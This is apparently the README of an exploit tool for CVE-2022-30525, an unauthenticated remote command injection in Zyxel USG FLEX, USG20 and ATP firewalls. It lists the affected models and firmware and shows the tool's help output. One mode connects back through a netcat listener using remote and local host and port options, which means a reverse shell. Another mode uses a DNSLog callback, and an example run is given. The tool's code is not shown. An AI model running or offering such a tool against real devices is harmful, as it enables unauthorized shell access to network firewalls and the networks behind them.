Zyxel 防火墙未经身份验证的远程命令注入漏洞
USG FLEX 100, 100W, 200, 500, 700 USG20-VPN, USG20W-VPN ATP 100, 200, 500, 700, 800
ZLD5.00 thru ZLD5.21 Patch 1 ZLD5.10 thru ZLD5.21 Patch 1 ZLD5.10 thru ZLD5.21 Patch
[root@localhost ~]# ./CVE-2022-30525 -h
NAME:
CVE-2022-30525 - Zyxel Firewall Command Injection (CVE-2022-30525)
USAGE:
CVE-2022-30525 [global options] command [command options] [arguments...]
COMMANDS:
nc use netcat listener
dnslog, d USE DNSLog
help, h Shows a list of commands or help for one command
GLOBAL OPTIONS:
--help, -h show help (default: false)
[root@localhost ~]# ./CVE-2022-30525 nc -h
NAME:
CVE-2022-30525 nc - use netcat listener
USAGE:
CVE-2022-30525 nc [command options] [arguments...]
OPTIONS:
--rhost value The remote address to exploit
--rport value The remote port to exploit (default: 443)
--lhost value The local address to connect back to
--lport value The local port to connect back to (default: 1270)
--protocol value The protocol handler to use (default: https://)
--ncpath value The path to nc (default: /usr/bin/nc)
--help, -h show help (default: false)
[root@localhost ~]# ./CVE-2022-30525 dnslog "http://192.168.0.123"